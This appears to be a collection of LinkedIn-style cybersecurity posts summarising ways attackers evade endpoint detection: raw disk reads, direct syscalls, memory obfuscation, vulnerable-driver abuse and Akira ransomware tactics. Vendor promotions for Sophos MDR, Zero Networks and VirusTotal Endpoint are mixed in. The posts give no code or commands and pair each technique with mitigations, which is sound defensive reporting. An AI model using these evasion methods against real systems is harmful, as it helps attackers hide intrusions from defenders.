New EDR Bypass Technique via Direct Disk Reads

🔓 New EDR Bypass Technique via Direct Disk Reads 📌 Security researchers have identified an innovative method to evade Endpoint Detection and Response (EDR) systems using direct disk read operations. This technique exploits a gap in conventional EDR monitoring, allowing attackers to execute malicious code without being detected. 🔍 How the technique works: - EDRs traditionally monitor system calls and in-memory activities - Direct disk read operations often go unnoticed - Attackers can use these reads to load and execute malicious payloads - The method avoids API hooks commonly used by EDR solutions ⚠️ Security implications: - Multiple EDR products could be vulnerable to this approach - Demonstrates the need to monitor disk-level activities - Security teams must update their detection capabilities 🛡️ Recommendations: - Implement monitoring of suspicious disk activities - Update EDR solutions to detect this type of bypass - Adopt a defense-in-depth approach For more information visit: https://enigmasecurity.cl 💙 Support our community to continue sharing relevant security research: https://lnkd.in/evtXjJTA 👥 Let's connect and talk about cybersecurity: https://lnkd.in/e9MMcb4Z #EDR #Cybersecurity #ThreatDetection #BypassTechniques #CyberDefense #Infosec #SecurityResearch #EndpointSecurity 📅 Fri, 05 Sep 2025 08:01:46 +0000 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt

🚨 Brinztech Alert: New Technique Allows Hackers to Bypass EDR Using Raw Disk Reads Security researchers have uncovered a stealthy attack method that bypasses Endpoint Detection and Response (EDR) tools by reading data directly from a raw disk. This technique enables attackers to steal highly sensitive files—such as credential stores—without triggering standard monitoring or logging. 🔍 Why It Matters Bypasses EDR & File Permissions: No standard file-access calls, making detection extremely difficult. Leaves No Default Logs: Forensic investigations become challenging. Multiple Attack Paths: From admin-level access to BYOVD (Bring Your Own Vulnerable Driver) exploits. ✅ Mitigation Strategies Implement Full Disk Encryption (e.g., BitLocker). Enforce Least Privilege principles. Enable Advanced Monitoring for raw disk access (e.g., Sysmon Event ID 9). Apply Driver Blocklists to prevent BYOVD attacks. At Brinztech, we help organizations stay ahead of evolving threats. 📩 Contact us to learn more about our cybersecurity solutions. For info for this post: https://lnkd.in/e_Ghti-K #CyberSecurity #EDR #ThreatIntelligence #Brinztech #InfoSec

🔐 Cybersecurity That Never Sleeps: Sophos MDR In today’s threat landscape, reactive security is no longer enough. That’s why organizations are turning to Sophos MDR — a fully managed 24/7 threat detection and response service powered by expert analysts and cutting-edge technology. ✅ Why Sophos MDR? 24/7/365 monitoring by a global SOC team Rapid response to threats with industry-leading SLAs Integration with existing security tools and telemetry Proactive threat hunting and real-time remediation Backed by advanced AI, EDR, SIEM, and SOAR capabilities Whether you're an SMB or an enterprise, Sophos MDR helps you stay ahead of attackers — even when your team is offline. 💡 Ready to elevate your cybersecurity posture? Let’s talk about how Sophos MDR can fit into your strategy. #CyberSecurity #SophosMDR #ManagedDetectionAndResponse #SOC #ThreatHunting #EDR #SIEM #SOAR #Infosec #ITSecurity #MDR

🔒 How attackers evade EDR and XDR detection: Memory obfuscation techniques 🧠 An in-depth analysis of the techniques cybercriminals use to bypass modern endpoint protection systems. Attackers are developing sophisticated methods that operate directly in memory, avoiding traditional signatures and static analysis. 🧩 Main techniques identified: - Shellcode injection into legitimate processes using Windows APIs - Use of direct system calls (syscalls) to avoid EDR hooks - Code obfuscation in memory using encryption and packing - Manipulation of PEB (Process Environment Block) to hide modules - Fileless attacks that reside entirely in memory 🛡️ Impact on security: These techniques represent a significant challenge for conventional EDR/XDR solutions, as the malware never touches the disk and uses operating system processes to camouflage itself. Attackers leverage tools like Cobalt Strike and living off the land techniques. 💡 Mitigation recommendations: - Implement real-time anomalous behavior monitoring - Use solutions that analyze activity in memory - Apply principles of least privilege and network segmentation - Keep security patches up to date - Train staff in advanced threat detection For more information visit: https://enigmasecurity.cl Are you concerned about the evolution of attack techniques? 🎯 Support our community to continue sharing relevant security analysis: https://lnkd.in/er_qUAQh Let's connect and talk about cybersecurity: https://lnkd.in/eGvmV6Xf #Cybersecurity #EDR #XDR #ThreatDetection #MemoryAnalysis #CyberDefense #InfoSec #Astralinux #Hacking #CyberThreats 📅 Wed, 03 Sep 2025 12:34:57 GMT 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt

🚨 𝐙𝐞𝐫𝐨 𝐍𝐞𝐭𝐰𝐨𝐫𝐤𝐬 𝐀𝐝𝐯𝐚𝐧𝐜𝐞𝐬 𝐂𝐈𝐒𝐀’𝐬 𝐙𝐞𝐫𝐨 𝐓𝐫𝐮𝐬𝐭 𝐌𝐢𝐜𝐫𝐨𝐬𝐞𝐠𝐦𝐞𝐧𝐭𝐚𝐭𝐢𝐨𝐧 𝐆𝐮𝐢𝐝𝐞𝐥𝐢𝐧𝐞𝐬🚨 Microsegmentation has shifted from a niche concept to a critical cybersecurity strategy. According to new EMA research, 96% of security leaders now see it as essential, with the top benefit being the ability to immediately isolate and contain threats. CISA’s newly released guidelines reinforce this urgency—placing microsegmentation at the heart of modern Zero Trust architectures to stop lateral movement and block ransomware. ⚡ 𝐙𝐞𝐫𝐨 𝐍𝐞𝐭𝐰𝐨𝐫𝐤𝐬 𝐦𝐚𝐤𝐞𝐬 𝐚𝐝𝐨𝐩𝐭𝐢𝐨𝐧 𝐬𝐢𝐦𝐩𝐥𝐞: ✔ Automated, agentless, and implemented in days ✔ Dynamic asset discovery & identity segmentation ✔ Integrated MFA at the network level ✔ No complex rule writing or multi-year projects 💬 “With Zero Networks, networks defend themselves from the start—nothing needs to be found or contained, because attackers can’t move or cause damage,” said Benny Lakunishok, Managing Director of Zero Networks. 👉 𝐋𝐞𝐚𝐫𝐧 𝐡𝐨𝐰 𝐭𝐨 𝐢𝐦𝐩𝐥𝐞𝐦𝐞𝐧𝐭 𝐚𝐮𝐭𝐨𝐦𝐚𝐭𝐞𝐝 𝐦𝐢𝐜𝐫𝐨𝐬𝐞𝐠𝐦𝐞𝐧𝐭𝐚𝐭𝐢𝐨𝐧 𝐚𝐥𝐢𝐠𝐧𝐞𝐝 𝐰𝐢𝐭𝐡 𝐂𝐈𝐒𝐀 𝐠𝐮𝐢𝐝𝐞𝐥𝐢𝐧𝐞𝐬: https://lnkd.in/dHigKDhg 👉 𝐑𝐞𝐚𝐝 𝐌𝐨𝐫𝐞: https://shorturl.at/dohdf #ZeroTrust #Cybersecurity #Microsegmentation #CISA #RansomwareDefense #ZeroNetworks

🔒 Major Shift in Cybersecurity: VirusTotal Launches New Endpoint Solution! 🚨 Here’s the breakdown of this game-changing announcement: 🛡️ VirusTotal, the iconic malware analysis service, has officially launched "VirusTotal Endpoint," a new solution that extends its powerful analysis capabilities directly to endpoints. 💻 The new tool installs a lightweight agent on devices, allowing security teams to proactively scan for IOCs Indicators of Compromise and suspicious files, pulling from a massive dataset of threat intelligence. 🔍 It enables on-demand scanning and file submission right from the endpoint, providing crucial context and visibility into potential threats that other tools might miss. 🤝 This move integrates its community-powered, multi-engine scanning power into the heart of your defense, layering endpoint data with its global intelligence network for richer insights. 🌐 This evolution signifies a strategic pivot from a primarily reactive analysis tool to a more proactive, intelligence-driven component of an organization's security stack. This fundamentally changes VirusTotal's role from a sandbox to an active defender. Does this signal the future of integrated threat intelligence, where analysis and endpoint protection become inseparable? #Cybersecurity #ThreatIntelligence #VirusTotal #EndpointSecurity #InfoSec #CyberDefense #MalwareAnalysis #Innovation Link:https://lnkd.in/dNnN7Vy5 #cybersecurity #infosec

How attackers evade EDR solutions: Advanced obfuscation and anti-analysis techniques 📊 A detailed technical analysis reveals the methodologies that threat actors use to evade endpoint detection and response (EDR) tools. Cybercriminals employ sophisticated techniques including: 👾 Code obfuscation using multiple layers of encryption and compression 🔄 Use of loaders that download malicious payloads into memory 🔍 Anti-debugging and anti-sandboxing techniques to avoid analysis 📦 Manipulation of legitimate system processes to execute malicious code 💻 These strategies allow malware to evade signature and behavior-based detections, representing a significant challenge for security teams. Research shows how attackers continuously adapt their methods to stay one step ahead of defenses. 🚨 The growing sophistication of these techniques underscores the need to adopt defense-in-depth approaches that combine multiple layers of security, including continuous monitoring, threat intelligence, and behavior analysis. For more information visit: https://enigmasecurity.cl 💙 Support our work to continue sharing relevant security analysis: https://lnkd.in/evtXjJTA 👥 Let's connect and talk about cybersecurity: https://lnkd.in/e8MjZ6AZ #Cybersecurity #EDR #ThreatDetection #CyberDefense #MalwareAnalysis #InfoSec #CyberThreats #SecurityOperations 📅 Tue, 16 Sep 2025 09:32:40 GMT 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt

🔒 New Akira Ransomware Technique Disables EDR and Evades Detection 🔍 The Akira ransomware has evolved its arsenal with a sophisticated technique that allows it to disable EDR (Endpoint Detection and Response) solutions without being detected. This method, recently identified by security researchers, represents a significant challenge for traditional defenses. 📌 Key details of the technique: - Uses legitimate system processes to load and execute malicious code in memory - Leverages Windows mechanisms such as LOLBins (Living Off The Land Binaries) - Evades traditional signatures and static analysis through advanced obfuscation - Enables the execution of payloads without leaving traces on disk ⚠️ Impact on security: This evolution demonstrates how threat actors continue to refine their methods to bypass enterprise security controls. Organizations must adopt defense-in-depth strategies that include behavior monitoring and network traffic analysis. 🛡️ Protection recommendations: - Implement EDR solutions with behavior-based detection capabilities - Keep security patches updated on all endpoints - Monitor suspicious activities related to system processes - Perform regular backups and ensure their offline storage For more information visit: https://enigmasecurity.cl #Cybersecurity #Ransomware #EDR #ThreatIntelligence #AkiraRansomware #CyberDefense #InfoSec Let's connect for more cybersecurity insights: https://lnkd.in/eGvmV6Xf 📅 2025-09-16T12:37:56 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt

🔍 How We Detected a Ransomware Attack in 5 Minutes Using Elastic Security 💡 In today’s world, ransomware attacks represent one of the biggest threats to organizations. Detection speed is crucial to minimizing impact. 🚨 Real Case: We detected a ransomware attack in just 5 minutes from the start of malicious activity. The attacker used living off the land techniques, native system tools, and legitimate processes to evade traditional detection methods. 📊 Tools Used: - Elastic Security Suite - Custom Detection Rules - Process Behavior Analysis - Real-Time Network Activity Monitoring 🔧 Identified Techniques: - Use of certutil to download malicious payloads - Execution of obfuscated PowerShell scripts - Lateral movement via WMI and SMB - Activation of ransomware with deletion of volume shadows ✅ Thanks to our behavior-based detection system and specific rules, we were able to: - Immediately alert the security team - Isolate compromised devices - Prevent the spread of ransomware - Preserve evidence for forensic analysis 📈 Lessons Learned: - Continuous monitoring is essential - Detection rules must be updated regularly - Behavior analysis outperforms traditional signatures - Rapid response minimizes damage For more information visit: https://enigmasecurity.cl 💙 Support our work to continue sharing cybersecurity analysis: https://lnkd.in/evtXjJTA Connect on LinkedIn: https://lnkd.in/g34EbJGn #Ransomware #Cybersecurity #ElasticSecurity #ThreatDetection #IncidentResponse #CyberDefense #SOC #SecurityOperations #ThreatHunting #CyberAttack 📅 Fri, 29 Aug 2025 13:37:25 GMT 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt

How attackers evade EDR detection using memory obfuscation techniques A new technical analysis reveals advanced methods that cybercriminals are using to bypass endpoint detection and response (EDR) solutions. These sophisticated techniques allow malware to operate undetected in corporate environments. 🧠 Main techniques identified: - Direct manipulation of kernel objects to hide malicious activity - Use of undocumented Windows APIs to avoid security hooks - Obfuscation of system calls through trampolining techniques - Manipulation of critical operating system data structures - Implementation of direct code execution in unsupervised memory regions 🛡️ Security implications: These methods represent a significant challenge for traditional EDR solutions, as they allow attackers to execute malicious code without generating detectable alerts or events. The cybersecurity community must develop more advanced countermeasures that monitor behavior at a deeper system level. 💡 Recommendations: - Implement kernel integrity monitoring - Use solutions that analyze behavior beyond API hooks - Keep security patches updated - Adopt defense-in-depth approaches For more information visit: https://enigmasecurity.cl Did you find this information useful? Support our community to continue sharing threat intelligence analysis. Your donation makes this work possible: https://lnkd.in/evtXjJTA Let's connect and talk about cybersecurity: https://lnkd.in/g34EbJGn #EDRSecurity #ThreatIntelligence #CyberDefense #MemoryObfuscation #EndpointSecurity #MalwareAnalysis #CyberSecurity #InfoSec 📅 Sun, 14 Sep 2025 11:46:48 GMT 🔗Subscribe to the Membership: https://lnkd.in/eh_rNRyt